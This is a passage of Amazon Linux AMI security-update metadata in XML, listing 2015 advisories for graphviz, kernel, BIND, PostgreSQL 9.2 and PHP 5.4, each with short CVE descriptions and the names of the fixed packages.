arch="i686"><filename>Packages/graphviz-R-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.38.0-18.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-488</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-488: medium priority package update for graphviz-php</title><issued date="2015-03-04 15:53:00" /><updated date="2015-03-04 16:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9157:
Format string vulnerability in the yyerror function in lib/cgraph/scan.l in Graphviz allows remote attackers to have unspecified impact via format string specifiers in unknown vector, which are not properly handled in an error string.
1167866:
CVE-2014-9157 graphviz: format string vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9157" title="" id="CVE-2014-9157" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-php" version="2.38.0" release="18.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php-2.38.0-18.40.amzn1.x86_64.rpm</filename></package><package name="graphviz-php" version="2.38.0" release="18.40.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php-2.38.0-18.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-489</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-489: medium priority package update for kernel</title><issued date="2015-03-05 09:31:00" /><updated date="2015-03-05 09:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0274:
A flaw was found in the way the Linux kernel's XFS file system handled replacing of remote attributes under certain conditions. A local user with access to XFS file system mount could potentially use this flaw to escalate their privileges on the system.
1195248:
CVE-2015-0274 kernel: xfs: replacing remote attributes memory corruption
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0274" title="" id="CVE-2015-0274" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.34" release="27.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.34-27.48.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.34" release="27.48.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.34-27.48.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.34" release="27.48.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.34-27.48.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-490</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-490: medium priority package update for bind</title><issued date="2015-03-13 02:33:00" /><updated date="2015-03-13 02:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1349:
A flaw was found in the way BIND handled trust anchor management. A remote attacker could use this flaw to cause the BIND daemon (named) to crash under certain conditions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1349" title="" id="CVE-2015-1349" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0672.html" title="" id="RHSA-2015:0672" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.36.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.36.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-491</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-491: low priority package update for kernel</title><issued date="2015-03-13 02:34:00" /><updated date="2015-03-13 02:47:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1593:
1192519:
CVE-2015-1593 kernel: Linux stack ASLR implementation Integer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1593" title="" id="CVE-2015-1593" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.35" release="28.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.35-28.38.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.35" release="28.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.35-28.38.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.35" release="28.38.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.35-28.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-492</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-492: medium priority package update for postgresql92</title><issued date="2015-03-13 02:37:00" /><updated date="2015-03-13 02:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0244:
A flaw was found in way PostgreSQL handled certain errors during that were generated during protocol synchronization. An authenticated database user could use this flaw to inject queries into an existing connection.
1188694:
CVE-2015-0244 postgresql: loss of frontend/backend protocol synchronization after an error
CVE-2015-0243:
A stack-buffer overflow flaw was found in PostgreSQL's pgcrypto module. An authenticated database user could use this flaw to cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
1188689:
CVE-2015-0243 postgresql: buffer overflow flaws in contrib/pgcrypto
CVE-2015-0242:
A buffer overflow flaw was found in the PostgreSQL's internal printf() implementation. An authenticated database user could use a specially crafted string in an SQL query to cause PostgreSQL to crash or, potentially, lead to privilege escalation.
1188688:
CVE-2015-0242 postgresql: buffer overflow flaws in replacement *printf() functions
CVE-2015-0241:
A buffer overflow flaw was found in the way PostgreSQL handled certain numeric formatting. An authenticated database user could use a specially crafted timestamp formatting template to cause PostgreSQL to crash or, under certain conditions, execute arbitrary code with the permissions of the user running PostgreSQL.
1188684:
CVE-2015-0241 postgresql: buffer overflow in the to_char() function
CVE-2014-8161:
An information leak flaw was found in the way certain the PostgreSQL database server handled certain error messages. An authenticated database user could possibly obtain the results of a query they did not have privileges to execute by observing the constraint violation error messages produced when the query was executed.
1182043:
CVE-2014-8161 postgresql: information leak through constraint violation errors
CVE-2014-0067:
The "make check" command for the test suites in PostgreSQL 9.3.3 and earlier does not properly invoke initdb to specify the authentication requirements for a database cluster to be used for the tests, which allows local users to gain privileges by leveraging access to this cluster.
1065863:
CVE-2014-0067 postgresql: Vulnerability during "make check"
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0067" title="" id="CVE-2014-0067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8161" title="" id="CVE-2014-8161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0241" title="" id="CVE-2015-0241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0242" title="" id="CVE-2015-0242" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0243" title="" id="CVE-2015-0243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0244" title="" id="CVE-2015-0244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-server-compat" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.10-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-493</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-493: critical priority package update for php54</title><issued date="2015-03-13 10:00:00" /><updated date="2015-03-13 10:03:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0273:
1194730:
CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone
CVE-2015-0235:
A heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.
1183461:
CVE-2015-0235 glibc: __nss_hostname_digits_dots() heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235" title="" id="CVE-2015-0235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273" title="" id="CVE-2015-0273" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-ldap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.38" release="1.66.amzn1" epoch="0" 